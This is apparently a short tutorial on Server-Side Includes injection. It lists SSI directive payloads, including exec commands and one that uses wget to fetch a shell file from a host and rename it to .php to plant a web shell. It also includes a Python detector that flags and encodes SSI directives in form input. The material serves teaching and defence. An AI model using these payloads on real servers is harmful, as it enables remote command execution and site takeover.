Server-Side Includes (SSI) Injection

The Server-Side Includes (SSI) injection attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be exploited by manipulating SSI already in use in the application or by forcing its use through user input fields.
SSIs are directives present in web applications that are used to feed an HTML page with dynamic content.
It is possible to check whether the application is properly validating input field data by inserting characters that are used in SSI directives, such as: < ! # = / . " - > and [a-zA-Z0-9]

Some examples of Server Side Includes are:

List files of directory:
<!--#exec cmd="ls" -->


Access directories: <!--#exec cmd="cd /root/dir/" -->


Execution script: <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->


To change the error message output:
<!--#config errmsg="File not found, informs users and password"-->


To show current document filename: <!--#echo var="DOCUMENT_NAME" -->


To show virtual path and filename: <!--#echo var="DOCUMENT_URI" -->


Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format: <!--#config timefmt="A %B %d %Y %r"-->


Using the “fsize” command, it is possible to print the size of selected file: <!--#fsize file="ssi.shtml" -->
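
A defensive input check for the directives listed above, as an added example that is not part of the original post: it flags SSI directive openers in submitted field values, including ones whose closing `-->` is missing, and HTML-encodes values so they are stored or reflected as inert text. The function names, the severity mapping and the sample field values are assumptions constructed for illustration.

```python
import html
import re

# Start of an SSI directive: "<!--#" followed by the directive name.
# The "-->" terminator is deliberately not required, so truncated or
# malformed directives are still flagged.
SSI_OPEN = re.compile(r"<!--#([a-zA-Z]+)")
# attribute="value" pairs inside a directive body
SSI_ATTR = re.compile(r'([a-zA-Z]+)\s*=\s*"([^"]*)"')

# Assumed triage mapping for this example: directives that run commands or
# pull in other files rank highest; everything else is "medium".
SEVERITY = {"exec": "high", "include": "high"}


def find_ssi_directives(value):
    """Return one finding per SSI directive opener found in value."""
    findings = []
    for m in SSI_OPEN.finditer(value):
        end = value.find("-->", m.end())
        body = value[m.end(): end if end != -1 else len(value)]
        name = m.group(1).lower()
        findings.append({
            "directive": name,
            "attrs": dict(SSI_ATTR.findall(body)),
            "terminated": end != -1,
            "severity": SEVERITY.get(name, "medium"),
        })
    return findings


def neutralize(value):
    """HTML-encode the value so the server never sees a literal '<!--#'."""
    return html.escape(value, quote=True)


def screen_fields(fields):
    """Map field name -> findings, for fields that contain SSI directives."""
    hits = {k: find_ssi_directives(v) for k, v in fields.items()}
    return {k: v for k, v in hits.items() if v}


# Constructed sample form submission (not captured traffic).
SAMPLE_FIELDS = {
    "name": "Alice",
    "comment": 'nice page <!--#echo var="DOCUMENT_NAME" -->',
    "bio": '<!--#exec cmd="cd /root/dir/">',   # closing "--" missing
    "note": "<!-- ordinary HTML comment -->",
}

if __name__ == "__main__":
    for field, found in screen_fields(SAMPLE_FIELDS).items():
        print(field, found, "->", neutralize(SAMPLE_FIELDS[field]))
```
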

To observe the server-side includes vulnerability, click on the link below (you have to create an account to check the vulnerability):

observe vulnerability
